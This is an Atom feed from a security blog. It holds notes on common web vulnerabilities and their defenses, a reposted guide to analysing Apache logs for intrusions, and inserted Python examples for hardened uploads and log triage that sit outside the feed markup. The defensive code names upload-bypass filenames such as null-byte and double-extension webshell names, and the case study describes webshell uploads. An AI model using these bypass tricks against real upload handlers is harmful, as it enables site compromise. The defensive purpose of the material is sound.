<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
<title>vQAQv's blog | Just Do It!</title>
<subtitle>To Be A Better Man</subtitle>
<link href="https://cr4ckm3.top/atom.xml" rel="self"/>
<link href="https://cr4ckm3.top/"/>
<updated>2021-09-01T03:37:48.272Z</updated>
<id>https://cr4ckm3.top/</id>
<author>
<name>vQAQv</name>
</author>
<generator uri="https://hexo.io/">Hexo</generator>
<entry>
<title>"Vulnerability box" gitbook notes</title>
<link href="https://cr4ckm3.top/2019/08/30/%E5%90%84%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0/"/>
<id>https://cr4ckm3.top/2019/08/30/%E5%90%84%E6%BC%8F%E6%B4%9E%E7%AC%94%E8%AE%B0/</id>
<published>2019-08-30T10:00:45.023Z</published>
<updated>2021-09-01T03:37:48.272Z</updated>
<content type="html"><![CDATA[<p>Notes on the Vulnerability box gitbook.</p><span id="more"></span><h2 id="0x00-SQL注入漏洞"><a href="#0x00-SQL注入漏洞" class="headerlink" title="0x00 SQL注入漏洞"></a>0x00 SQL injection</h2><h3 id="漏洞简述:"><a href="#漏洞简述:" class="headerlink" title="漏洞简述:"></a>Overview:</h3><p>SQL injection arises when the application builds SQL statements from data the user submits to the server without validating it, and without effectively handling the characters that carry special meaning for the SQL parser.</p><h3 id="防御:"><a href="#防御:" class="headerlink" title="防御:"></a>Defenses:</h3><ul><li>Use parameterized queries (prepared statements), so user data is never concatenated into SQL text</li><li>Strictly validate user data</li><li>Web application firewall</li><li>Database activity monitoring</li><li>Regex-based filtering (a defense-in-depth measure only; blacklists are routinely bypassed)</li></ul><h2 id="0x01-目录遍历漏洞"><a href="#0x01-目录遍历漏洞" class="headerlink" title="0x01 目录遍历漏洞"></a>0x01 Directory traversal</h2><h3 id="漏洞简述:-1"><a href="#漏洞简述:-1" class="headerlink" title="漏洞简述:"></a>Overview:</h3><p>The attacker reads system files and server configuration files, abusing the server's file-access API and the default file permissions to reach paths outside the web root.</p><h3 id="防御:-1"><a href="#防御:-1" class="headerlink" title="防御:"></a>Defenses:</h3><ul><li>Fix the server configuration (disable directory listing)</li><li>Set directory permissions</li><li>Create an empty index.html in every directory (this only hides listings; it does not stop traversal)</li><li>Canonicalize any user-supplied path and reject it unless it resolves inside the intended base directory</li></ul><h2 id="0x02-跨站脚本漏洞-xss漏洞"><a href="#0x02-跨站脚本漏洞-xss漏洞" class="headerlink" title="0x02 跨站脚本漏洞(xss漏洞)"></a>0x02 Cross-site scripting (XSS)</h2><h3 id="漏洞简述:-2"><a href="#漏洞简述:-2" class="headerlink" title="漏洞简述:"></a>Overview:</h3><p>The attacker injects script into a page the site serves. It can steal the cookies of administrators or other users, silently load a browser-side trojan, and, when the victim is privileged, do considerably more.</p><h4 id="危害:"><a href="#危害:" class="headerlink" title="危害:"></a>Impact:</h4><ul><li>Phishing and theft of private data.</li><li>Spreading script worms and drive-by downloads.</li><li>Hijacking the user's session and acting under the user's identity.</li></ul><h3 id="防御:-2"><a href="#防御:-2" class="headerlink" title="防御:"></a>Defenses:</h3><ul><li>Encode/escape output for the context it is written into (HTML body, attribute, JavaScript, URL)</li><li>XSS filter with allow/deny lists</li><li>Sanitize rich text (permit only a safe set of tags and attributes)</li><li>Set HttpOnly on session cookies (limits cookie theft; it does not stop the injected script itself)</li></ul><h2 id="0x03-跨站请求伪造漏洞-csrf漏洞"><a href="#0x03-跨站请求伪造漏洞-csrf漏洞" class="headerlink" title="0x03 跨站请求伪造漏洞(csrf漏洞)"></a>0x03 Cross-site request forgery (CSRF)</h2><h3 id="漏洞简述:-3"><a href="#漏洞简述:-3" class="headerlink" title="漏洞简述:"></a>Overview:</h3><p>The attacker forges a request that the site accepts as coming from a trusted, logged-in user, and uses it to add, delete or modify content.<br>Impersonating the user or administrator, the forged request can tamper with data, transfer funds, change passwords, send mail and perform other unauthorized operations.</p><h3 id="防御:-3"><a href="#防御:-3" class="headerlink" title="防御:"></a>Defenses:</h3><ul><li>Filter user input; do not allow posted links that point at state-changing URLs on the site (weak on its own: the forged request usually comes from a page the attacker hosts elsewhere)</li><li>On the user side, log out before browsing other sites, or clear cookies when the browser session ends</li><li>Replace persistent authorization (cookies, HTTP authentication) with per-request authorization, i.e. a hidden field carried in every form</li><li>Require a CAPTCHA for critical operations; accept only POST for state changes, and keep GET requests read-only so they never change server-side state</li></ul><h3 id="服务端的防御:"><a href="#服务端的防御:" class="headerlink" title="服务端的防御:"></a>Server-side defenses:</h3><ul><li>Check the HTTP Referer header (weak: browsers and proxies may strip it, so treat a missing Referer as a failure rather than a pass).</li><li>Add a token to the request and verify it: the token is bound to the session, is sent as a request parameter rather than only in a cookie, and is compared by the server against the session's value on every state-changing request.</li><li>Send the token in a custom HTTP request header. This works because a cross-site form submission cannot set custom headers, so a forged request never carries it; it also keeps the token out of URLs and Referer leaks.</li></ul><h3 id="客户端防御:"><a href="#客户端防御:" class="headerlink" title="客户端防御:"></a>Client-side defenses:</h3><ul><li>To match the server-side check, the page attaches the token to every link and form it contains, typically with JavaScript that appends a csrftoken parameter; the token is a global variable whose value the server rendered into the page from the session. The client does not invent the token, it only echoes the one the server issued.</li></ul><h2 id="0x04-URL-重定向漏洞-URL跳转"><a href="#0x04-URL-重定向漏洞-URL跳转" class="headerlink" title="0x04 URL 重定向漏洞(URL跳转)"></a>0x04 URL redirect (open redirect)</h2><h3 id="漏洞简述:-4"><a href="#漏洞简述:-4" class="headerlink" title="漏洞简述:"></a>Overview:</h3><p>If the returnURL parameter can be changed to point at a malicious site, an attacker can phish from a link that starts on the trusted domain and steal the user's credentials.</p><h3 id="防御:-4"><a href="#防御:-4" class="headerlink" title="防御:"></a>Defenses:</h3><ul><li>Web application firewall</li><li>Strictly validate the input: accept only relative paths or an allowlist of known hosts as redirect targets</li></ul><h2 id="0x05-文件上传漏洞"><a href="#0x05-文件上传漏洞" class="headerlink" title="0x05 文件上传漏洞"></a>0x05 File upload</h2><h3 id="漏洞简述:-5"><a href="#漏洞简述:-5" class="headerlink" title="漏洞简述:"></a>Overview:</h3><p>Unrestricted upload: the file type is not limited, so a webshell can be uploaded and then executed by the server.</p><h3 id="防御:-5"><a href="#防御:-5" class="headerlink" title="防御:"></a>Defenses:</h3><ul><li>Strictly validate the uploaded file's format and scan it, to stop malicious script files</li><li>Strictly limit the file types that may be uploaded</li><li>Strictly limit the path the file is written to</li><li>Validate the file content on the server side (magic bytes, not just the extension)</li><li>Set permissions so that nothing in the upload directory can be executed</li><li>Rename uploaded files</li></ul><h2 id="0x06-Unicode-编码转换漏洞"><a href="#0x06-Unicode-编码转换漏洞" class="headerlink" title="0x06 Unicode 编码转换漏洞"></a>0x06 Unicode encoding conversion</h2><h3 id="漏洞简述:-6"><a href="#漏洞简述:-6" class="headerlink" title="漏洞简述:"></a>Overview:</h3><p>During Unicode conversion some characters are dropped or normalized, so an attacker can split or re-encode attack keywords to slip past detection by security devices.</p><h3 id="防御:-6"><a href="#防御:-6" class="headerlink" title="防御:"></a>Defenses:</h3><ul><li>Fix the middleware; filter the affected characters, and decode and normalize input before any filter inspects it</li><li>Web application firewall</li></ul><h2 id="0x07-旁站攻击漏洞"><a href="#0x07-旁站攻击漏洞" class="headerlink" title="0x07 旁站攻击漏洞"></a>0x07 Side-site attack (via another site on the same host)</h2><h1 id="参考来自"><a href="#参考来自" class="headerlink" title="参考来自"></a>Reference</h1><p><a href="https://book.thief.one/">nMask–>Vulnerability box</a></p>]]></content>
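Worked example of the file-upload and directory-traversal defenses listed above, added here as an illustration; it is not code from the Vulnerability box gitbook or from this blog. It assumes a policy that accepts only PNG, JPEG and GIF images, stores them under an upload root with a random name, and checks the magic bytes as well as the extension; the size limit, file names and bytes used in the demo are constructed.

```python
"""Hardened upload handling: extension allowlist, magic-byte check, random
rename, path confinement, and no execute bit.  Added example; not code from
the Vulnerability box gitbook or this blog."""
import os
import secrets
import tempfile
from pathlib import Path

# Allowed extensions and the magic bytes the body must start with.  The
# extension the client sends is never trusted on its own.
ALLOWED = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 5 * 1024 * 1024  # assumed policy limit


class UploadRejected(ValueError):
    pass


def check_upload(client_name: str, data: bytes) -> str:
    """Validate an upload and return the extension it will be stored with.

    Rejects oversized bodies, NUL bytes in the name (the classic
    "shell.php\\0.jpg" truncation trick), double extensions such as
    shell.php.jpg, unknown extensions, and bodies whose magic bytes do not
    match the extension.
    """
    if len(data) > MAX_BYTES:
        raise UploadRejected("too large")
    base = os.path.basename(client_name.replace("\\", "/"))
    if "\x00" in base:
        raise UploadRejected("NUL byte in filename")
    parts = base.lower().split(".")
    if len(parts) != 2 or not parts[0]:
        raise UploadRejected("exactly one extension is required")
    ext = parts[1]
    if ext not in ALLOWED:
        raise UploadRejected("extension not allowed: " + ext)
    if not any(data.startswith(magic) for magic in ALLOWED[ext]):
        raise UploadRejected("content does not match extension")
    return ext


def is_rejected(client_name: str, data: bytes) -> bool:
    """True if check_upload refuses the input (convenience for tests)."""
    try:
        check_upload(client_name, data)
    except UploadRejected:
        return True
    return False


def store_upload(upload_root: Path, client_name: str, data: bytes) -> Path:
    """Write the file under upload_root with a random name and mode 0600.

    The resolved destination must stay inside upload_root: the traversal
    check from section 0x01 applied to the storage path.  O_EXCL makes sure
    an existing file is never overwritten.
    """
    ext = check_upload(client_name, data)
    root = upload_root.resolve()
    dest = (root / (secrets.token_hex(16) + "." + ext)).resolve()
    if root not in dest.parents:
        raise UploadRejected("destination escaped upload root")
    fd = os.open(dest, os.O_WRONLY | os.O_CREAT | os.O_EXCL, 0o600)
    with os.fdopen(fd, "wb") as fh:
        fh.write(data)
    return dest


def demo() -> tuple:
    """Store one constructed PNG (with a traversal-style name) and try one
    disguised script; returns (stored_inside_root, not_executable, php_rejected)."""
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32  # constructed, not a real image
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp).resolve()
        dest = store_upload(Path(tmp), "../../avatar.png", png)
        stored_ok = dest.is_file() and dest.parent == root
        not_exec = not os.access(dest, os.X_OK)
    php_rejected = is_rejected("shell.php.png", png)
    return stored_ok, not_exec, php_rejected


if __name__ == "__main__":
    print(demo())  # (True, True, True)
```

The mode bits only stop the file from being executed as a program; the interpreter still runs anything the web server hands it, so the upload directory must also have script execution disabled in the web server itself (for mod_php, php_flag engine off in that directory's configuration).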
<summary type="html"><p>Notes on the Vulnerability box gitbook.</p></summary>
<category term="Notes" scheme="https://cr4ckm3.top/tags/%E7%AC%94%E8%AE%B0/"/>
</entry>
<entry>
<title>Web log security analysis techniques (repost)</title>
<link href="https://cr4ckm3.top/2019/07/05/Apache_Web%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/"/>
<id>https://cr4ckm3.top/2019/07/05/Apache_Web%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/</id>
<published>2019-07-04T16:00:00.000Z</published>
<updated>2019-08-30T10:00:43.483Z</updated>
<content type="html"><![CDATA[<h1 id="Web日志安全分析技巧"><a href="#Web日志安全分析技巧" class="headerlink" title="Web日志安全分析技巧"></a><p style="text-align: center;">Web log security analysis techniques</p></h1><p>Web access logs record the raw facts about every request the web server received and handled, together with runtime errors. Security analysis of those logs not only helps us locate the attacker, it also lets us reconstruct the attack path and find and fix the vulnerabilities the site has.</p><span id="more"></span><h2 id="0x01-Web日志"><a href="#0x01-Web日志" class="headerlink" title="0x01 Web日志"></a>0x01 Web logs</h2><p>Here is one line from an Apache access log:</p><figure class="highlight cmd"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">127</span>.<span class="number">0</span>.<span class="number">0</span>.<span class="number">1</span> - - [<span class="number">11</span>/Jun/<span class="number">2018</span>:<span class="number">12</span>:<span class="number">47</span>:<span class="number">22</span> +<span class="number">0800</span>] "GET /login.html HTTP/<span class="number">1</span>.<span class="number">1</span>" <span class="number">200</span> <span class="number">786</span> "-" "Mozilla/<span class="number">5</span>.<span class="number">0</span> (Windows NT <span class="number">10</span>.<span class="number">0</span>; WOW64) AppleWebKit/<span class="number">537</span>.<span class="number">36</span> (KHTML, like Gecko) Chrome/<span class="number">66</span>.<span class="number">0</span>.<span class="number">3359</span>.<span class="number">139</span> Safari/<span class="number">537</span>.<span class="number">36</span>"</span><br></pre></td></tr></table></figure><p>From this one line we can tell which IP the user came from, when, with which operating system and browser, which page of the site was requested, and whether the request succeeded: here a 200 response of 786 bytes.</p><p>This article presents the reasoning used in web log security analysis and a number of commonly used techniques.</p><h2 id="0x02-日志分析技巧"><a href="#0x02-日志分析技巧" class="headerlink" title="0x02 日志分析技巧"></a>0x02 Log analysis techniques</h2><p>Security analysis of web logs usually proceeds along one of two lines, going deeper step by step until the whole attack is reconstructed.</p><p>First: establish the time window of the intrusion, use it as the lead, look for suspicious entries in that window, narrow down from there, and finally identify the attacker and reconstruct the attack.</p><p>Second: after breaking in, an attacker usually leaves a backdoor to keep access for later visits. Find that file and use it as the lead for the analysis.</p><p>Common tools:</p><p>On Windows, EmEditor is recommended for log analysis; it handles large files and searches reasonably fast.</p><p>On Linux, combine shell commands to query and analyze.</p><p>Shell log analysis generally combines grep, awk and similar commands; the statistics below are the common recipes.</p><p>Apache log analysis recipes:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">1. IPs with the most requests today (sort before uniq -c, otherwise only adjacent duplicates are counted):</span><br><span class="line">cut -d- -f 1 log_file | sort | uniq -c | sort -rn | head -20</span><br><span class="line"></span><br><span class="line">2. Number of distinct IPs that visited today:</span><br><span class="line">awk <span class="string">'{print $1}'</span> log_file|sort|uniq|wc -l</span><br><span class="line"></span><br><span class="line">3. How many times one page was requested:</span><br><span class="line">grep <span class="string">"/index.php"</span> log_file | wc -l</span><br><span class="line"></span><br><span class="line">4. How many pages each IP requested:</span><br><span class="line">awk <span class="string">'{++S[$1]} END {for (a in S) print a,S[a]}'</span> log_file</span><br><span class="line"></span><br><span class="line">5. The same, sorted by page count, ascending:</span><br><span class="line">awk <span class="string">'{++S[$1]} END {for (a in S) print S[a],a}'</span> log_file | sort -n</span><br><span class="line"></span><br><span class="line">6. Which pages one IP requested:</span><br><span class="line">grep ^111.111.111.111 log_file| awk <span class="string">'{print $1,$7}'</span></span><br><span class="line"></span><br><span class="line">7. Distinct IPs today excluding search engines (crude: many crawlers also start their User-Agent with Mozilla/):</span><br><span class="line">awk <span class="string">'{print $12,$1}'</span> log_file | grep ^\"Mozilla | awk <span class="string">'{print $2}'</span> |sort | uniq | wc -l</span><br><span class="line"></span><br><span class="line">8. Distinct IPs during the hour starting 21 Jun 2018 14:00:</span><br><span class="line">awk <span class="string">'{print $4,$1}'</span> log_file | grep 21/Jun/2018:14 | awk <span class="string">'{print $2}'</span>| sort | uniq | wc -l</span><br><span class="line"></span><br><span class="line">9. With no log platform and a small volume, list the top 10 URIs (or IPs) in the access log to spot malicious IPs or an endpoint hit far too often:</span><br><span class="line">awk <span class="string">'{print $7}'</span> access.log | sort -n |uniq -c | sort -rn | head -n 10</span><br></pre></td></tr></table></figure><h2 id="0x03-日志分析案例"><a href="#0x03-日志分析案例" class="headerlink" title="0x03 日志分析案例"></a>0x03 A log analysis case</h2><p>Example: nginx reverse-proxies to a server on the internal network. Several image-disguised webshells had been uploaded into a directory of one site on that server. IIS 7 would not execute them there, but we still wanted to know who uploaded them and by what route.</p><p>Here we hit a problem: because of the proxy, the logs record only the proxy server's IP, not the visitor's. How, then, do we tell visitors and attack sources apart?</p><p>This is a log-configuration mistake by the administrator (the back end should log X-Forwarded-For or the real client address), but we can still use the browser fingerprint, the User-Agent string, to separate visitors and reconstruct the attack path. The fingerprint is client-controlled and can be shared by many clients, so it is a lead rather than an identity.</p><p>1. Locating the attack source</p><p>Searching for requests to the image webshell found only one entry, and since every line carries the proxy IP the path cannot be traced by IP. The browser fingerprint can do it.</p><p>Browser fingerprint:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+6.1;+WOW64;+Trident/7.0;+SLCC2;+.NET+CLR+2.0.50727;+.NET+CLR+3.5.30729;+.NET+CLR+3.0.30729;+.NET4.0C;+.NET4.0E)</span><br></pre></td></tr></table></figure><p>2. Searching the related entries</p><p>Filtering the log on that fingerprint shows the attacker's path clearly.</p><p>3. Reading the entries found, the attacker's route was roughly:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">A. The attacker visits the home page and the login page</span><br><span class="line">B. The attacker visits MsgSjlb.aspx and MsgSebd.aspx</span><br><span class="line">C. The attacker visits Xzuser.aspx</span><br><span class="line">D. The attacker sends several POSTs (suspected: the upload module on this page is flawed)</span><br><span class="line">E. The attacker requests the image webshell</span><br></pre></td></tr></table></figure><p>Opening the site and visiting Xzuser.aspx confirmed that the attacker uploaded the image webshell through that page. It also turned out that the site had a broken access control: by requesting a specific URL the attacker reached the back-end interface without logging in. The log analysis located the vulnerable spots so that they could be fixed.</p><h2 id="0x04-日志统计分析技巧"><a href="#0x04-日志统计分析技巧" class="headerlink" title="0x04 日志统计分析技巧"></a>0x04 Log statistics techniques</h2><blockquote><p>Check auth.log to see whether SSH is being brute-forced</p></blockquote><p>IPs that logged in as root with a password, with counts</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grep <span class="string">"Accepted password for root"</span> /var/<span class="built_in">log</span>/auth.log | awk <span class="string">'{print $11}'</span> | sort | uniq -c | sort -nr | more</span><br></pre></td></tr></table></figure><p>IPs that failed a password login as root, with counts</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grep <span class="string">"Failed password for root"</span> /var/<span class="built_in">log</span>/auth.log | awk <span class="string">'{print $11}'</span> | sort | uniq -c | sort -nr | more</span><br></pre></td></tr></table></figure><p>Crawler statistics:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grep -E <span class="string">'Googlebot|Baiduspider'</span> /www/logs/access.2019-02-23.log | awk <span class="string">'{ print $1 }'</span> | sort | uniq</span><br></pre></td></tr></table></figure><p>Non-browser clients (lines whose User-Agent matches none of the common browser names; tools and scanners show up here):</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /www/logs/access.2019-02-23.log | grep -v -E <span class="string">'MSIE|Firefox|Chrome|Opera|Safari|Gecko|Maxthon'</span> | sort | uniq -c | sort -r -n | head -n 100</span><br></pre></td></tr></table></figure><p>IP statistics:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">grep <span class="string">'23/May/2019'</span> /www/logs/access.2019-02-23.log | awk <span class="string">'{print $1}'</span> | awk -F<span class="string">'.'</span> <span class="string">'{print $1"."$2"."$3"."$4}'</span> | sort | uniq -c | sort -r -n | head -n 10</span><br><span class="line"> 2206 219.136.134.13</span><br><span class="line"> 1497 182.34.15.248</span><br><span class="line"> 1431 211.140.143.100</span><br><span class="line"> 1431 119.145.149.106</span><br><span class="line"> 1427 61.183.15.179</span><br><span class="line"> 1427 218.6.8.189</span><br><span class="line"> 1422 124.232.150.171</span><br><span class="line"> 1421 106.187.47.224</span><br><span class="line"> 1420 61.160.220.252</span><br><span class="line"> 1418 114.80.201.18</span><br></pre></td></tr></table></figure><p>Network (/24) statistics:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /www/logs/access.2019-02-23.log | awk <span class="string">'{print $1}'</span> | awk -F<span class="string">'.'</span> <span class="string">'{print $1"."$2"."$3".0"}'</span> | sort | uniq -c | sort -r -n | head -n 200 </span><br></pre></td></tr></table></figure><p>Host name statistics (only meaningful with a log format whose second field is the host name; in the default combined format field 2 is the ident placeholder "-"):</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /www/logs/access.2019-02-23.log |awk <span class="string">'{print $2}'</span>|sort|uniq -c|sort -rn|more</span><br></pre></td></tr></table></figure><p>HTTP status codes:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">cat /www/logs/access.2019-02-23.log |awk <span class="string">'{print $9}'</span>|sort|uniq -c|sort -rn|more</span><br><span class="line">5056585 304</span><br><span class="line">1125579 200</span><br><span class="line"> 7602 400</span><br><span class="line"> 5 301</span><br></pre></td></tr></table></figure><p>URL statistics:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /www/logs/access.2019-02-23.log |awk <span class="string">'{print $7}'</span>|sort|uniq -c|sort -rn|more</span><br></pre></td></tr></table></figure><p>Per-file traffic (bytes summed by URL; the second form counts only 200 responses):</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">cat /www/logs/access.2019-02-23.log |awk <span class="string">'{sum[$7]+=$10}END{for(i in sum){print sum[i],i}}'</span>|sort -rn|more</span><br><span class="line">grep <span class="string">' 200 '</span> /www/logs/access.2019-02-23.log |awk <span class="string">'{sum[$7]+=$10}END{for(i in sum){print sum[i],i}}'</span>|sort -rn|more</span><br></pre></td></tr></table></figure><p>URLs carrying a query string, by request count:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">cat /www/logs/access.2019-02-23.log | awk <span class="string">'{print $7}'</span> | egrep <span class="string">'\?|&'</span> | sort | uniq -c | sort -rn | more</span><br></pre></td></tr></table></figure><p>Script run time:</p><p>Find the slowest scripts. This assumes the log format appends the request duration (%D) as the last field; grep -v 0$ drops entries that took 0, and the file name is given once to grep, not again to awk.</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">grep -v 0$ /www/logs/access.2019-02-23.log | awk -F <span class="string">'\" '</span> <span class="string">'{print $4" " $1}'</span> | awk <span class="string">'{print $1" "$8}'</span> | sort -n -k 1 -r | uniq > /tmp/slow_url.txt</span><br></pre></td></tr></table></figure><p>IP and URL extraction (live):</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">tail -f /www/logs/access.2019-02-23.log | grep <span class="string">'/test.html'</span> | awk <span class="string">'{print $1" "$7}'</span></span><br></pre></td></tr></table></figure><ul><li>Source (repost)</li></ul><p><a href="https://mp.weixin.qq.com/s/CtnHy9X7_csTwrG5KJvDjg">Bypass WeChat official account - Web log security analysis techniques</a></p>]]></content>
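The same statistics and the User-Agent pivot from the case above, as an added example in Python rather than awk; it is not part of the original article. The log lines are constructed: every request arrives through a reverse proxy, so the client IP column is always the proxy address 10.0.0.5 and the only way to separate visitors is the User-Agent fingerprint. The page names Xzuser.aspx and the image path are borrowed from the case study; the timestamps, proxy address and User-Agent strings are invented.

```python
"""Apache combined-log triage over constructed lines: top talkers, status
counts, non-browser clients, and the User-Agent pivot used when a proxy
hides the client IP.  Added example; not the article's own code."""
import re
from collections import Counter, defaultdict

# Groups: ip, time, method, path, status, size, referer, user-agent
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+) "([^"]*)" "([^"]*)"$'
)

# Constructed User-Agent strings (invented, not captured traffic).
BROWSER = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/75.0 Safari/537.36"
ATTACKER = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; "
            "Trident/7.0; .NET CLR 2.0.50727)")
SCANNER = "python-requests/2.18.4"
PROXY = "10.0.0.5"  # every line carries the reverse proxy's address


def _line(ts, req, status, size, ua):
    return f'{PROXY} - - [{ts} +0800] "{req} HTTP/1.1" {status} {size} "-" "{ua}"'


# Constructed sample log: a normal visitor, an attacker, and a scanner.
SAMPLE_LOG = "\n".join([
    _line("21/Jun/2018:14:01:02", "GET /", 200, 5120, BROWSER),
    _line("21/Jun/2018:14:01:09", "GET /login.aspx", 200, 2210, BROWSER),
    _line("21/Jun/2018:14:02:00", "GET /", 200, 5120, ATTACKER),
    _line("21/Jun/2018:14:02:07", "GET /login.aspx", 200, 2210, ATTACKER),
    _line("21/Jun/2018:14:02:31", "GET /Xzuser.aspx", 200, 3380, ATTACKER),
    _line("21/Jun/2018:14:02:45", "POST /Xzuser.aspx", 200, 3380, ATTACKER),
    _line("21/Jun/2018:14:02:58", "POST /Xzuser.aspx", 200, 3380, ATTACKER),
    _line("21/Jun/2018:14:03:20", "GET /upload/1.jpg", 200, 890, ATTACKER),
    _line("21/Jun/2018:14:05:00", "GET /wp-login.php", 404, 210, SCANNER),
    _line("21/Jun/2018:14:05:01", "GET /phpmyadmin/", 404, 210, SCANNER),
])


def parse(log_text):
    """Return one dict per well-formed line; malformed lines are skipped."""
    records = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, path, status, size, referer, ua = m.groups()
        records.append({"ip": ip, "time": ts, "method": method, "path": path,
                        "status": int(status), "size": 0 if size == "-" else int(size),
                        "referer": referer, "ua": ua})
    return records


def top(records, key, n=10):
    """Equivalent of awk '{print $N}' | sort | uniq -c | sort -rn | head."""
    return Counter(r[key] for r in records).most_common(n)


def status_counts(records):
    return Counter(r["status"] for r in records)


BROWSER_MARKERS = ("MSIE", "Firefox", "Chrome", "Opera", "Safari", "Gecko", "Maxthon")


def non_browser_clients(records):
    """The grep -v -E 'MSIE|Firefox|...' recipe: clients that look like tools."""
    return Counter(r["ua"] for r in records
                   if not any(mark in r["ua"] for mark in BROWSER_MARKERS))


def paths_by_fingerprint(records):
    """Request sequence per User-Agent: the pivot used when only the proxy IP is logged."""
    seq = defaultdict(list)
    for r in records:
        seq[r["ua"]].append((r["time"], r["method"], r["path"]))
    return seq


IMAGE_EXT = (".jpg", ".jpeg", ".png", ".gif")


def suspicious_fingerprints(records):
    """Flag a visitor that POSTs to a page and then fetches an image afterwards,
    the upload-then-trigger pattern from the case; returns {ua: (post_path, image_path)}."""
    hits = {}
    for ua, steps in paths_by_fingerprint(records).items():
        posted = None
        for _ts, method, path in steps:
            if method == "POST":
                posted = path
            elif posted and path.lower().endswith(IMAGE_EXT):
                hits[ua] = (posted, path)
                break
    return hits


if __name__ == "__main__":
    recs = parse(SAMPLE_LOG)
    print("status codes:", dict(status_counts(recs)))
    print("non-browser clients:", dict(non_browser_clients(recs)))
    for ua, (post_path, img) in suspicious_fingerprints(recs).items():
        print("suspect fingerprint:", ua)
        print("  POST", post_path, "then GET", img)
```

To run it over a real file, replace SAMPLE_LOG with the file contents; the regex expects the default combined format, so a custom LogFormat needs a matching pattern.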
<summary type="html"><h1 id="Web日志安全分析技巧"><a href="#Web日志安全分析技巧" class="headerlink" title="Web日志安全分析技巧"></a><p style="text-align: center;">Web log security analysis techniques</p></h1><p>Web access logs record the raw facts about every request the web server received and handled, together with runtime errors. Security analysis of those logs not only helps us locate the attacker, it also lets us reconstruct the attack path and find and fix the vulnerabilities the site has.</p></summary>
<category term="Log analysis" scheme="https://cr4ckm3.top/tags/%E6%97%A5%E5%BF%97%E5%88%86%E6%9E%90/"/>
</entry>
<entry>
<title>Some PHP code analysis study notes</title>
<link href="https://cr4ckm3.top/2019/07/05/%E4%B8%80%E4%BA%9Bphp%E7%AC%94%E8%AE%B0/"/>
<id>https://cr4ckm3.top/2019/07/05/%E4%B8%80%E4%BA%9Bphp%E7%AC%94%E8%AE%B0/</id>
<published>2019-07-04T16:00:00.000Z</published>
<updated>2019-08-30T10:00:44.793Z</updated>
